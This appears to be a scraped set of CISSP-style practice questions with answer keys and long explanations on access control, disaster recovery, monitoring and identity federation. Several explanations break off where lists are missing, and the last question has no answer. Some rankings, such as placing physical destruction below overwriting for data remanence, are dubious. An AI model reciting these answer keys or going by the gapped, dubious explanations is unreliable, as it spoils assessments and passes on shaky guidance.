Software security functional requirements are the specific and measurable security features and capabilities that the system must provide to meet the security objectives and requirements. Software security functional requirements are derived from the business functional analysis and the data security categorization, which are two tasks that are performed in the system initiation phase of the SDLC. The business functional analysis is the process of identifying and documenting the business functions and processes that the system must support and enable, such as the inputs, outputs, workflows, and tasks. The data security categorization is the process of determining the security level and impact of the system and its data, based on the confidentiality, integrity, and availability criteria, and applying the appropriate security controls and measures. Software security functional requirements must be defined after the business functional analysis and the data security categorization have been performed, because they can ensure that the system design and development are consistent and compliant with the security objectives and requirements, and that the system security is aligned and integrated with the business functions and processes.
The other options are not the phases of the SDLC when the software security functional requirements must be defined, but rather phases that involve other tasks or activities related to the system design and development. After the system preliminary design has been developed and the data security categorization has been performed is not the phase when the software security functional requirements must be defined, but rather the phase when the system architecture and components are designed, based on the system scope and objectives, and the data security categorization is verified and validated. After the vulnerability analysis has been performed and before the system detailed design begins is not the phase when the software security functional requirements must be defined, but rather the phase when the system design and components are evaluated and tested for the security effectiveness and compliance, and the system detailed design is developed, based on the system architecture and components. After the system preliminary design has been developed and before the data security categorization begins is not the phase when the software security functional requirements must be defined, but rather the phase when the system architecture and components are designed, based on the system scope and objectives, and the data security categorization is initiated and planned.
A Java program is being developed to read a file from computer A and write it to computer B, using a third computer C. The program is not working as expected. What is the MOST probable security feature of Java preventing the program from operating as intended?
Least privilege
Privilege escalation
Defense in depth
Privilege bracketing
The most probable security feature of Java preventing the program from operating as intended is least privilege. Least privilege is a principle that states that a subject (such as a user, a process, or a program) should only have the minimum amount of access or permissions that are necessary to perform its function or task. Least privilege can help to reduce the attack surface and the potential damage of a system or network, by limiting the exposure and impact of a subject in case of a compromise or misuse.
Java implements the principle of least privilege through its security model, which consists of several components, such as:
In this question, the Java program is being developed to read a file from computer A and write it to computer B, using a third computer C. This means that the Java program needs to have the permissions to perform the file I/O and the network communication operations, which are considered as sensitive or risky actions by the Java security model. However, if the Java program is running on computer C with the default or the minimal security permissions, such as in the Java Security Sandbox, then it will not be able to perform these operations, and the program will not work as expected. Therefore, the most probable security feature of Java preventing the program from operating as intended is least privilege, which limits the access or permissions of the Java program based on its source, signer, or policy.
The other options are not the security features of Java preventing the program from operating as intended, but rather concepts or techniques that are related to security in general or in other contexts. Privilege escalation is a technique that allows a subject to gain higher or unauthorized access or permissions than what it is supposed to have, by exploiting a vulnerability or a flaw in a system or network. Privilege escalation can help an attacker to perform malicious actions or to access sensitive resources or data, by bypassing the security controls or restrictions. Defense in depth is a concept that states that a system or network should have multiple layers or levels of security, to provide redundancy and resilience in case of a breach or an attack. Defense in depth can help to protect a system or network from various threats and risks, by using different types of security measures and controls, such as the physical, the technical, or the administrative ones. Privilege bracketing is a technique that allows a subject to temporarily elevate or lower its access or permissions, to perform a specific function or task, and then return to its original or normal level. Privilege bracketing can help to reduce the exposure and impact of a subject, by minimizing the time and scope of its higher or lower access or permissions.
What operations role is responsible for protecting the enterprise from corrupt or contaminated media?
Information security practitioner
Information librarian
Computer operator
Network administrator
According to the CISSP CBK Official Study Guide1, an information librarian is responsible for managing, maintaining, and protecting the organization’s knowledge resources, including ensuring that media (such as hard drives, USBs, CDs) are free from corruption or contamination to protect the enterprise’s data integrity. An information librarian is also responsible for cataloging, indexing, and classifying the media, as well as providing access and retrieval services to the authorized users. An information librarian may also perform backup, recovery, and disposal of the media, as well as monitor and audit the usage and security of the media. An information security practitioner is not the operations role that is responsible for protecting the enterprise from corrupt or contaminated media, although they may be involved in defining and enforcing the policies and standards for the media security. An information security practitioner is a general term for a person who performs various functions and tasks related to the information security of the organization, such as planning, designing, implementing, testing, operating, or auditing the information security systems and controls. An information security practitioner may also provide guidance, advice, and training to the other roles and stakeholders on the information security matters. A computer operator is not the operations role that is responsible for protecting the enterprise from corrupt or contaminated media, although they may be involved in using and handling the media. A computer operator is a person who operates and controls the computer systems and devices of the organization, such as the servers, workstations, printers, or scanners. A computer operator may also perform tasks such as loading and unloading the media, running and monitoring the programs and applications, troubleshooting and resolving the errors and problems, and reporting and documenting the activities and incidents. A network administrator is not the operations role that is responsible for protecting the enterprise from corrupt or contaminated media, although they may be involved in configuring and connecting the media. A network administrator is a person who administers and manages the network systems and devices of the organization, such as the routers, switches, firewalls, or wireless access points. A network administrator may also perform tasks such as installing and updating the network software and hardware, setting and maintaining the network parameters and security, optimizing and troubleshooting the network performance and availability, and supporting and assisting the network users and clients. References: 1
Which of the following is the MOST important consideration when developing a Disaster Recovery Plan (DRP)?
The dynamic reconfiguration of systems
The cost of downtime
A recovery strategy for all business processes
A containment strategy
According to the CISSP All-in-One Exam Guide1, the most important consideration when developing a Disaster Recovery Plan (DRP) is to have a recovery strategy for all business processes. A DRP is a document that defines the procedures and actions to be taken in the event of a disaster that disrupts the normal operations of an organization. A recovery strategy is a plan that specifies how the organization will restore the critical business processes and functions, as well as the supporting resources, such as data, systems, personnel, and facilities, within the predefined recovery objectives and time frames. A recovery strategy should cover all business processes, not just the IT-related ones, as they may have interdependencies and impacts on each other. A recovery strategy should also be aligned with the business continuity plan (BCP), which is a document that defines the procedures and actions to be taken to ensure the continuity of the essential business operations during and after a disaster. The dynamic reconfiguration of systems is not the most important consideration when developing a DRP, although it may be a useful technique to enhance the resilience and availability of the systems. The dynamic reconfiguration of systems is the ability to change the configuration and functionality of the systems without interrupting their operations, such as adding, removing, or replacing components, modules, or services. The dynamic reconfiguration of systems may help to reduce the downtime and recovery time of the systems, but it does not address the recovery of the business processes and functions. The cost of downtime is not the most important consideration when developing a DRP, although it may be a factor that influences the recovery objectives and priorities. The cost of downtime is the amount of money that the organization loses or spends due to the disruption of its normal operations, such as loss of revenue, productivity, reputation, or customers, as well as the expenses for recovery, restoration, or compensation. The cost of downtime may help to justify the investment and budget for the DRP, but it does not address the recovery of the business processes and functions. A containment strategy is not the most important consideration when developing a DRP, although it may be a part of the incident response plan (IRP), which is a document that defines the procedures and actions to be taken to detect, analyze, contain, eradicate, and recover from a security incident. A containment strategy is a plan that specifies how the organization will isolate and control the incident, such as disconnecting the affected systems, blocking the malicious traffic, or changing the passwords. A containment strategy may help to prevent or limit the damage and spread of the incident, but it does not address the recovery of the business processes and functions. References: 1
Place in order, from BEST (1) to WORST (4), the following methods to reduce the risk of data remanence on magnetic media.
Comprehensive Explanation: Degaussing is the process of decreasing or eliminating a remnant magnetic field to reduce the risk of data remanence on magnetic media, making it the best method among the options provided. Overwriting involves replacing old data with new data, which can also be effective but not as thorough as degaussing. Destruction refers to physically destroying the media, which is effective but not always practical or environmentally friendly. Deleting is simply removing data pointers and does not actually erase the data from the media, making it the worst option.
References:
Which of the following is the BEST method to assess the effectiveness of an organization's vulnerability management program?
Review automated patch deployment reports
Periodic third party vulnerability assessment
Automated vulnerability scanning
Perform vulnerability scan by security team
A third-party vulnerability assessment provides an unbiased evaluation of the organization’s security posture, identifying existing vulnerabilities and offering recommendations for mitigation. It is more comprehensive and objective compared to internal reviews or automated scans. References: CISSP Official (ISC)2 Practice Tests, Chapter 5, page 137
What is the process called when impact values are assigned to the security objectives for information types?
Qualitative analysis
Quantitative analysis
Remediation
System security categorization
The process called when impact values are assigned to the security objectives for information types is system security categorization. System security categorization is a process of determining the potential impact on an organization if a system or information is compromised, based on the security objectives of confidentiality, integrity, and availability. System security categorization helps to identify the security requirements and controls for the system or information, as well as to prioritize the resources and efforts for protecting them. System security categorization can be based on the standards or guidelines provided by the organization or the relevant authorities, such as the Federal Information Processing Standards (FIPS) Publication 199 or the National Institute of Standards and Technology (NIST) Special Publication 800-6034 References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 1: Security and Risk Management, p. 29; Official (ISC)2 CISSP CBK Reference, Fifth Edition, Domain 1: Security and Risk Management, p. 31.
Although code using a specific program language may not be susceptible to a buffer overflow attack,
most calls to plug-in programs are susceptible.
most supporting application code is susceptible.
the graphical images used by the application could be susceptible.
the supporting virtual machine could be susceptible.
According to the CISSP CBK Official Study Guide, although code using a specific program language may not be susceptible to a buffer overflow attack, the supporting virtual machine could be susceptible. A buffer overflow attack is a type of attack that exploits a vulnerability in the memory allocation and management of a program, by sending more data than the buffer can hold, and overwriting the adjacent memory locations, such as the return address, the stack pointer, or the registers. A buffer overflow attack can result in various consequences, such as crashing the program, executing arbitrary code, or escalating privileges. A program language is a set of rules and syntax that defines how a program is written and executed, such as C, Java, Python, or Ruby. Some program languages, such as C, are more susceptible to buffer overflow attacks, as they allow direct manipulation of memory and pointers, and do not perform bounds checking on the buffers. Other program languages, such as Java, are less susceptible to buffer overflow attacks, as they use a virtual machine to execute the code, and perform automatic memory management and garbage collection. A virtual machine is a software application that emulates a physical machine, and provides an isolated and abstracted environment for running programs, such as the Java Virtual Machine (JVM) or the .NET Framework. However, the virtual machine itself could be susceptible to buffer overflow attacks, as it may be written in a program language that is vulnerable, or it may have flaws or bugs in its implementation or configuration. Therefore, the code using a specific program language may not be susceptible to a buffer overflow attack, but the supporting virtual machine could be susceptible. The calls to plug-in programs, the supporting application code, and the graphical images used by the application are not necessarily related to the susceptibility of the code using a specific program language to a buffer overflow attack, as they may depend on other factors, such as the type, source, and quality of the plug-in programs, the application code, and the graphical images, as well as the security controls and mechanisms that are applied to them.
A continuous information security-monitoring program can BEST reduce risk through which of the following?
Collecting security events and correlating them to identify anomalies
Facilitating system-wide visibility into the activities of critical user accounts
Encompassing people, process, and technology
Logging both scheduled and unscheduled system changes
A continuous information security monitoring program can best reduce risk through encompassing people, process, and technology. A continuous information security monitoring program is a process that involves maintaining the ongoing awareness of the security status, events, and activities of a system or network, by collecting, analyzing, and reporting the security data and information, using various methods and tools. A continuous information security monitoring program can provide several benefits, such as:
A continuous information security monitoring program can best reduce risk through encompassing people, process, and technology, because it can ensure that the continuous information security monitoring program is holistic and comprehensive, and that it covers all the aspects and elements of the system or network security. People, process, and technology are the three pillars of a continuous information security monitoring program, and they represent the following:
The other options are not the best ways to reduce risk through a continuous information security monitoring program, but rather specific or partial ways that can contribute to the risk reduction. Collecting security events and correlating them to identify anomalies is a specific way to reduce risk through a continuous information security monitoring program, but it is not the best way, because it only focuses on one aspect of the security data and information, and it does not address the other aspects, such as the security objectives and requirements, the security controls and measures, and the security feedback and improvement. Facilitating system-wide visibility into the activities of critical user accounts is a partial way to reduce risk through a continuous information security monitoring program, but it is not the best way, because it only covers one element of the system or network security, and it does not cover the other elements, such as the security threats and vulnerabilities, the security incidents and impacts, and the security response and remediation. Logging both scheduled and unscheduled system changes is a specific way to reduce risk through a continuous information security monitoring program, but it is not the best way, because it only focuses on one type of the security events and activities, and it does not focus on the other types, such as the security alerts and notifications, the security analysis and correlation, and the security reporting and documentation.
What is the MOST important step during forensic analysis when trying to learn the purpose of an unknown application?
Disable all unnecessary services
Ensure chain of custody
Prepare another backup of the system
Isolate the system from the network
Isolating the system from the network is the most important step during forensic analysis when trying to learn the purpose of an unknown application. An unknown application is an application that is not recognized or authorized by the system or network administrator, and that may have been installed or executed without the user’s knowledge or consent. An unknown application may have various purposes, such as:
Forensic analysis is a process that involves examining and investigating the system or network for any evidence or traces of the unknown application, such as its origin, nature, behavior, and impact. Forensic analysis can provide several benefits, such as:
Isolating the system from the network is the most important step during forensic analysis when trying to learn the purpose of an unknown application, because it can ensure that the system is isolated and protected from any external or internal influences or interferences, and that the forensic analysis is conducted in a safe and controlled environment. Isolating the system from the network can also help to:
The other options are not the most important steps during forensic analysis when trying to learn the purpose of an unknown application, but rather steps that should be done after or along with isolating the system from the network. Disabling all unnecessary services is a step that should be done after isolating the system from the network, because it can ensure that the system is optimized and simplified for the forensic analysis, and that the system resources and functions are not consumed or affected by any irrelevant or redundant services. Ensuring chain of custody is a step that should be done along with isolating the system from the network, because it can ensure that the integrity and authenticity of the evidence are maintained and documented throughout the forensic process, and that the evidence can be traced and verified. Preparing another backup of the system is a step that should be done after isolating the system from the network, because it can ensure that the system data and configuration are preserved and replicated for the forensic analysis, and that the system can be restored and recovered in case of any damage or loss.
What would be the MOST cost effective solution for a Disaster Recovery (DR) site given that the organization’s systems cannot be unavailable for more than 24 hours?
Warm site
Hot site
Mirror site
Cold site
A warm site is the most cost effective solution for a disaster recovery (DR) site given that the organization’s systems cannot be unavailable for more than 24 hours. A DR site is a backup facility that can be used to restore the normal operation of the organization’s IT systems and infrastructure after a disruption or disaster. A DR site can have different levels of readiness and functionality, depending on the organization’s recovery objectives and budget. The main types of DR sites are:
A warm site is the most cost effective solution for a disaster recovery (DR) site given that the organization’s systems cannot be unavailable for more than 24 hours, because it can provide a balance between the recovery time and the recovery cost. A warm site can enable the organization to resume its critical functions and operations within a reasonable time frame, without spending too much on the DR site maintenance and operation. A warm site can also provide some flexibility and scalability for the organization to adjust its recovery strategies and resources according to its needs and priorities.
The other options are not the most cost effective solutions for a disaster recovery (DR) site given that the organization’s systems cannot be unavailable for more than 24 hours, but rather solutions that are either too costly or too slow for the organization’s recovery objectives and budget. A hot site is a solution that is too costly for a disaster recovery (DR) site given that the organization’s systems cannot be unavailable for more than 24 hours, because it requires the organization to invest a lot of money on the DR site equipment, software, and services, and to pay for the ongoing operational and maintenance costs. A hot site may be more suitable for the organization’s systems that cannot be unavailable for more than a few hours or minutes, or that have very high availability and performance requirements. A mirror site is a solution that is too costly for a disaster recovery (DR) site given that the organization’s systems cannot be unavailable for more than 24 hours, because it requires the organization to duplicate its entire primary site, with the same hardware, software, data, and applications, and to keep them online and synchronized at all times. A mirror site may be more suitable for the organization’s systems that cannot afford any downtime or data loss, or that have very strict compliance and regulatory requirements. A cold site is a solution that is too slow for a disaster recovery (DR) site given that the organization’s systems cannot be unavailable for more than 24 hours, because it requires the organization to spend a lot of time and effort on the DR site installation, configuration, and restoration, and to rely on other sources of backup data and applications. A cold site may be more suitable for the organization’s systems that can be unavailable for more than a few days or weeks, or that have very low criticality and priority.
With what frequency should monitoring of a control occur when implementing Information Security Continuous Monitoring (ISCM) solutions?
Continuously without exception for all security controls
Before and after each change of the control
At a rate concurrent with the volatility of the security control
Only during system implementation and decommissioning
Monitoring of a control should occur at a rate concurrent with the volatility of the security control when implementing Information Security Continuous Monitoring (ISCM) solutions. ISCM is a process that involves maintaining the ongoing awareness of the security status, events, and activities of a system or network, by collecting, analyzing, and reporting the security data and information, using various methods and tools. ISCM can provide several benefits, such as:
A security control is a measure or mechanism that is implemented to protect the system or network from the security threats or risks, by preventing, detecting, or correcting the security incidents or impacts. A security control can have various types, such as administrative, technical, or physical, and various attributes, such as preventive, detective, or corrective. A security control can also have different levels of volatility, which is the degree or frequency of change or variation of the security control, due to various factors, such as the security requirements, the threat landscape, or the system or network environment.
Monitoring of a control should occur at a rate concurrent with the volatility of the security control when implementing ISCM solutions, because it can ensure that the ISCM solutions can capture and reflect the current and accurate state and performance of the security control, and can identify and report any issues or risks that might affect the security control. Monitoring of a control at a rate concurrent with the volatility of the security control can also help to optimize the ISCM resources and efforts, by allocating them according to the priority and urgency of the security control.
The other options are not the correct frequencies for monitoring of a control when implementing ISCM solutions, but rather incorrect or unrealistic frequencies that might cause problems or inefficiencies for the ISCM solutions. Continuously without exception for all security controls is an incorrect frequency for monitoring of a control when implementing ISCM solutions, because it is not feasible or necessary to monitor all security controls at the same and constant rate, regardless of their volatility or importance. Continuously monitoring all security controls without exception might cause the ISCM solutions to consume excessive or wasteful resources and efforts, and might overwhelm or overload the ISCM solutions with too much or irrelevant data and information. Before and after each change of the control is an incorrect frequency for monitoring of a control when implementing ISCM solutions, because it is not sufficient or timely to monitor the security control only when there is a change of the security control, and not during the normal operation of the security control. Monitoring the security control only before and after each change might cause the ISCM solutions to miss or ignore the security status, events, and activities that occur between the changes of the security control, and might delay or hinder the ISCM solutions from detecting and responding to the security issues or incidents that affect the security control. Only during system implementation and decommissioning is an incorrect frequency for monitoring of a control when implementing ISCM solutions, because it is not appropriate or effective to monitor the security control only during the initial or final stages of the system or network lifecycle, and not during the operational or maintenance stages of the system or network lifecycle. Monitoring the security control only during system implementation and decommissioning might cause the ISCM solutions to neglect or overlook the security status, events, and activities that occur during the regular or ongoing operation of the system or network, and might prevent or limit the ISCM solutions from improving and optimizing the security control.
Which of the following BEST describes Recovery Time Objective (RTO)?
Time of data validation after disaster
Time of data restoration from backup after disaster
Time of application resumption after disaster
Time of application verification after disaster
The best description of Recovery Time Objective (RTO) is the time of application resumption after disaster. RTO is a metric that defines the maximum acceptable time that an application or a system can be unavailable or offline after a disaster or a disruption. RTO is based on the business impact analysis and the recovery requirements of the organization, and it helps to determine the recovery strategies and the resources needed to restore the application or the system to its normal operation. Time of data validation after disaster, time of data restoration from backup after disaster, and time of application verification after disaster are not the best descriptions of RTO, as they are related to the quality, accuracy, or completeness of the data or the application, not the availability or the downtime of the application or the system. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 7, Security Operations, page 899. Official (ISC)2 CISSP CBK Reference, Fifth Edition, Chapter 7, Security Operations, page 915.
Refer to the information below to answer the question.
A new employee is given a laptop computer with full administrator access. This employee does not have a personal computer at home and has a child that uses the computer to send and receive e-mail, search the web, and use instant messaging. The organization’s Information Technology (IT) department discovers that a peer-to-peer program has been installed on the computer using the employee's access.
Which of the following methods is the MOST effective way of removing the Peer-to-Peer (P2P) program from the computer?
Run software uninstall
Re-image the computer
Find and remove all installation files
Delete all cookies stored in the web browser cache
The most effective way of removing the P2P program from the computer is to re-image the computer. Re-imaging the computer means to restore the computer to its original or desired state, by erasing or overwriting the existing data or software on the computer, and by installing a new or a backup image of the operating system and the applications on the computer. Re-imaging the computer can ensure that the P2P program and any other unwanted or harmful programs or files are completely removed from the computer, and that the computer is clean and secure. Run software uninstall, find and remove all installation files, and delete all cookies stored in the web browser cache are not the most effective ways of removing the P2P program from the computer, as they may not remove all the traces or components of the P2P program from the computer, or they may not address the other potential issues or risks that the P2P program may have caused on the computer. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 7, Security Operations, page 906. Official (ISC)2 CISSP CBK Reference, Fifth Edition, Chapter 7, Security Operations, page 922.
Refer to the information below to answer the question.
An organization experiencing a negative financial impact is forced to reduce budgets and the number of Information Technology (IT) operations staff performing basic logical access security administration functions. Security processes have been tightly integrated into normal IT operations and are not separate and distinct roles.
Which of the following will indicate where the IT budget is BEST allocated during this time?
Policies
Frameworks
Metrics
Guidelines
The best indicator of where the IT budget is best allocated during this time is the metrics. The metrics are the measurements or the indicators of the performance, the effectiveness, the efficiency, or the quality of the IT processes, activities, or outcomes. The metrics can help to allocate the IT budget in a rational, objective, and evidence-based manner, as they can show the value, the impact, or the return of the IT investments, and they can identify the gaps, the risks, or the opportunities for the IT improvement or enhancement. The metrics can also help to justify, communicate, or report the IT budget allocation to the senior management or the stakeholders, and to align the IT budget allocation with the business needs and requirements. Policies, frameworks, and guidelines are not the best indicators of where the IT budget is best allocated during this time, as they are related to the documents or the models that define, guide, or standardize the IT processes, activities, or outcomes, not the measurements or the indicators of the IT performance, effectiveness, efficiency, or quality. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 1, Security and Risk Management, page 38. Official (ISC)2 CISSP CBK Reference, Fifth Edition, Chapter 1, Security and Risk Management, page 53.
An online retail company has formulated a record retention schedule for customer transactions. Which of the following is a valid reason a customer transaction is kept beyond the retention schedule?
Pending legal hold
Long term data mining needs
Customer makes request to retain
Useful for future business initiatives
A valid reason for keeping a customer transaction beyond the retention schedule is a pending legal hold. A legal hold is a requirement or an order to preserve certain records or data that are relevant or potentially relevant to a legal matter, such as a lawsuit, an investigation, or an audit. A legal hold can override the normal record retention schedule or policy of an organization, and can mandate the organization to retain the records or data until the legal matter is resolved or the legal hold is lifted. A pending legal hold can be a valid reason for keeping a customer transaction beyond the retention schedule, as it can ensure the compliance, evidence, or liability of the organization or the customer. Long term data mining needs, customer makes request to retain, and useful for future business initiatives are not valid reasons for keeping a customer transaction beyond the retention schedule, as they are related to the business value, preference, or strategy of the organization or the customer, not the legal obligation or necessity of the organization or the customer. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 1, Security and Risk Management, page 49. Official (ISC)2 CISSP CBK Reference, Fifth Edition, Chapter 1, Security and Risk Management, page 64.
Refer to the information below to answer the question.
A new employee is given a laptop computer with full administrator access. This employee does not have a personal computer at home and has a child that uses the computer to send and receive e-mail, search the web, and use instant messaging. The organization’s Information Technology (IT) department discovers that a peer-to-peer program has been installed on the computer using the employee's access.
Which of the following could have MOST likely prevented the Peer-to-Peer (P2P) program from being installed on the computer?
Removing employee's full access to the computer
Supervising their child's use of the computer
Limiting computer's access to only the employee
Ensuring employee understands their business conduct guidelines
The best way to prevent the P2P program from being installed on the computer is to remove the employee’s full access to the computer. Full access or administrator access means that the user has the highest level of privilege or permission to perform any action or operation on the computer, such as installing, modifying, or deleting any software or file. By removing the employee’s full access to the computer, and assigning them a lower level of access, such as user or guest, the organization can restrict the employee’s ability to install unauthorized or potentially harmful programs, such as P2P programs, on the computer. Supervising their child’s use of the computer, limiting computer’s access to only the employee, and ensuring employee understands their business conduct guidelines are not the best ways to prevent the P2P program from being installed on the computer, as they are related to the monitoring, control, or awareness of the computer usage, not the restriction or limitation of the computer access. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 5, Identity and Access Management, page 660. Official (ISC)2 CISSP CBK Reference, Fifth Edition, Chapter 5, Identity and Access Management, page 676.
What is the BEST first step for determining if the appropriate security controls are in place for protecting data at rest?
Identify regulatory requirements
Conduct a risk assessment
Determine business drivers
Review the security baseline configuration
A risk assessment is the best first step for determining if the appropriate security controls are in place for protecting data at rest. A risk assessment involves identifying the assets, threats, vulnerabilities, and impacts related to the data, as well as the likelihood and severity of potential breaches. Based on the risk assessment, the appropriate security controls can be selected and implemented to mitigate the risks to an acceptable level. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 1: Security and Risk Management, p. 35; Official (ISC)2 CISSP CBK Reference, Fifth Edition, Domain 1: Security and Risk Management, p. 41.
Users require access rights that allow them to view the average salary of groups of employees. Which control would prevent the users from obtaining an individual employee’s salary?
Limit access to predefined queries
Segregate the database into a small number of partitions each with a separate security level
Implement Role Based Access Control (RBAC)
Reduce the number of people who have access to the system for statistical purposes
Limiting access to predefined queries is the control that would prevent the users from obtaining an individual employee’s salary, if they only require access rights that allow them to view the average salary of groups of employees. A query is a request for information from a database, which can be expressed in a structured query language (SQL) or a graphical user interface (GUI). A query can specify the criteria, conditions, and operations for selecting, filtering, sorting, grouping, and aggregating the data from the database. A predefined query is a query that has been created and stored in advance by the database administrator or the data owner, and that can be executed by the authorized users without any modification. A predefined query can provide several benefits, such as:
Limiting access to predefined queries is the control that would prevent the users from obtaining an individual employee’s salary, if they only require access rights that allow them to view the average salary of groups of employees, because it can ensure that the users can only access the data that is relevant and necessary for their tasks, and that they cannot access or manipulate the data that is beyond their scope or authority. For example, a predefined query can be created and stored that calculates and displays the average salary of groups of employees based on certain criteria, such as department, position, or experience. The users who need to view this information can execute this predefined query, but they cannot modify it or create their own queries that might reveal the individual employee’s salary or other sensitive data.
The other options are not the controls that would prevent the users from obtaining an individual employee’s salary, if they only require access rights that allow them to view the average salary of groups of employees, but rather controls that have other purposes or effects. Segregating the database into a small number of partitions each with a separate security level is a control that would improve the performance and security of the database by dividing it into smaller and manageable segments that can be accessed and processed independently and concurrently. However, this control would not prevent the users from obtaining an individual employee’s salary, if they have access to the partition that contains the salary data, and if they can create or modify their own queries. Implementing Role Based Access Control (RBAC) is a control that would enforce the access rights and permissions of the users based on their roles or functions within the organization, rather than their identities or attributes. However, this control would not prevent the users from obtaining an individual employee’s salary, if their roles or functions require them to access the salary data, and if they can create or modify their own queries. Reducing the number of people who have access to the system for statistical purposes is a control that would reduce the risk and impact of unauthorized access or disclosure of the sensitive data by minimizing the exposure and distribution of the data. However, this control would not prevent the users from obtaining an individual employee’s salary, if they are among the people who have access to the system, and if they can create or modify their own queries.
A manufacturing organization wants to establish a Federated Identity Management (FIM) system with its 20 different supplier companies. Which of the following is the BEST solution for the manufacturing organization?
Trusted third-party certification
Lightweight Directory Access Protocol (LDAP)
Security Assertion Markup language (SAML)
Cross-certification
Security Assertion Markup Language (SAML) is the best solution for the manufacturing organization that wants to establish a Federated Identity Management (FIM) system with its 20 different supplier companies. FIM is a process that allows the sharing and recognition of identities across different organizations that have a trust relationship. FIM enables the users of one organization to access the resources or services of another organization without having to create or maintain multiple accounts or credentials. FIM can provide several benefits, such as:
SAML is a standard protocol that supports FIM by allowing the exchange of authentication and authorization information between different parties. SAML uses XML-based messages, called assertions, to convey the identity, attributes, and entitlements of a user to a service provider. SAML defines three roles for the parties involved in FIM:
SAML works as follows:
SAML is the best solution for the manufacturing organization that wants to establish a FIM system with its 20 different supplier companies, because it can enable the seamless and secure access to the resources or services across the different organizations, without requiring the users to create or maintain multiple accounts or credentials. SAML can also provide interoperability and compatibility between different platforms and technologies, as it is based on a standard and open protocol.
The other options are not the best solutions for the manufacturing organization that wants to establish a FIM system with its 20 different supplier companies, but rather solutions that have other limitations or drawbacks. Trusted third-party certification is a process that involves a third party, such as a certificate authority (CA), that issues and verifies digital certificates that contain the public key and identity information of a user or an entity. Trusted third-party certification can provide authentication and encryption for the communication between different parties, but it does not provide authorization or entitlement information for the access to the resources or services. Lightweight Directory Access Protocol (LDAP) is a protocol that allows the access and management of directory services, such as Active Directory, that store the identity and attribute information of users and entities. LDAP can provide a centralized and standardized way to store and retrieve identity and attribute information, but it does not provide a mechanism to exchange or federate the information across different organizations. Cross-certification is a process that involves two or more CAs that establish a trust relationship and recognize each other’s certificates. Cross-certification can extend the trust and validity of the certificates across different domains or organizations, but it does not provide a mechanism to exchange or federate the identity, attribute, or entitlement information.
Which of the following BEST describes an access control method utilizing cryptographic keys derived from a smart card private key that is embedded within mobile devices?
Derived credential
Temporary security credential
Mobile device credentialing service
Digest authentication
Derived credential is the best description of an access control method utilizing cryptographic keys derived from a smart card private key that is embedded within mobile devices. A smart card is a device that contains a microchip that stores a private key and a digital certificate that are used for authentication and encryption. A smart card is typically inserted into a reader that is attached to a computer or a terminal, and the user enters a personal identification number (PIN) to unlock the smart card and access the private key and the certificate. A smart card can provide a high level of security and convenience for the user, as it implements a two-factor authentication method that combines something the user has (the smart card) and something the user knows (the PIN).
However, a smart card may not be compatible or convenient for mobile devices, such as smartphones or tablets, that do not have a smart card reader or a USB port. To address this issue, a derived credential is a solution that allows the user to use a mobile device as an alternative to a smart card for authentication and encryption. A derived credential is a cryptographic key and a certificate that are derived from the smart card private key and certificate, and that are stored on the mobile device. A derived credential works as follows:
A derived credential can provide a secure and convenient way to use a mobile device as an alternative to a smart card for authentication and encryption, as it implements a two-factor authentication method that combines something the user has (the mobile device) and something the user is (the biometric feature). A derived credential can also comply with the standards and policies for the use of smart cards, such as the Personal Identity Verification (PIV) or the Common Access Card (CAC) programs.
The other options are not the best descriptions of an access control method utilizing cryptographic keys derived from a smart card private key that is embedded within mobile devices, but rather descriptions of other methods or concepts. Temporary security credential is a method that involves issuing a short-lived credential, such as a token or a password, that can be used for a limited time or a specific purpose. Temporary security credential can provide a flexible and dynamic way to grant access to the users or entities, but it does not involve deriving a cryptographic key from a smart card private key. Mobile device credentialing service is a concept that involves providing a service that can issue, manage, or revoke credentials for mobile devices, such as certificates, tokens, or passwords. Mobile device credentialing service can provide a centralized and standardized way to control the access of mobile devices, but it does not involve deriving a cryptographic key from a smart card private key. Digest authentication is a method that involves using a hash function, such as MD5, to generate a digest or a fingerprint of the user’s credentials, such as the username and password, and sending it to the server for verification. Digest authentication can provide a more secure way to authenticate the user than the basic authentication, which sends the credentials in plain text, but it does not involve deriving a cryptographic key from a smart card private key.
What is the BEST approach for controlling access to highly sensitive information when employees have the same level of security clearance?
Audit logs
Role-Based Access Control (RBAC)
Two-factor authentication
Application of least privilege
Applying the principle of least privilege is the best approach for controlling access to highly sensitive information when employees have the same level of security clearance. The principle of least privilege is a security concept that states that every user or process should have the minimum amount of access rights and permissions that are necessary to perform their tasks or functions, and nothing more. The principle of least privilege can provide several benefits, such as:
Applying the principle of least privilege is the best approach for controlling access to highly sensitive information when employees have the same level of security clearance, because it can ensure that the employees can only access the information that is relevant and necessary for their tasks or functions, and that they cannot access or manipulate the information that is beyond their scope or authority. For example, if the highly sensitive information is related to a specific project or department, then only the employees who are involved in that project or department should have access to that information, and not the employees who have the same level of security clearance but are not involved in that project or department.
The other options are not the best approaches for controlling access to highly sensitive information when employees have the same level of security clearance, but rather approaches that have other purposes or effects. Audit logs are records that capture and store the information about the events and activities that occur within a system or a network, such as the access and usage of the sensitive data. Audit logs can provide a reactive and detective layer of security by enabling the monitoring and analysis of the system or network behavior, and facilitating the investigation and response of the incidents. However, audit logs cannot prevent or reduce the access or disclosure of the sensitive information, but rather provide evidence or clues after the fact. Role-Based Access Control (RBAC) is a method that enforces the access rights and permissions of the users based on their roles or functions within the organization, rather than their identities or attributes. RBAC can provide a granular and dynamic layer of security by defining and assigning the roles and permissions according to the organizational structure and policies. However, RBAC cannot control the access to highly sensitive information when employees have the same level of security clearance and the same role or function within the organization, but rather rely on other criteria or mechanisms. Two-factor authentication is a technique that verifies the identity of the users by requiring them to provide two pieces of evidence or factors, such as something they know (e.g., password, PIN), something they have (e.g., token, smart card), or something they are (e.g., fingerprint, face). Two-factor authentication can provide a strong and preventive layer of security by preventing unauthorized access to the system or network by the users who do not have both factors. However, two-factor authentication cannot control the access to highly sensitive information when employees have the same level of security clearance and the same two factors, but rather rely on other criteria or mechanisms.
After acquiring the latest security updates, what must be done before deploying to production systems?
Use tools to detect missing system patches
Install the patches on a test system
Subscribe to notifications for vulnerabilities
Assess the severity of the situation
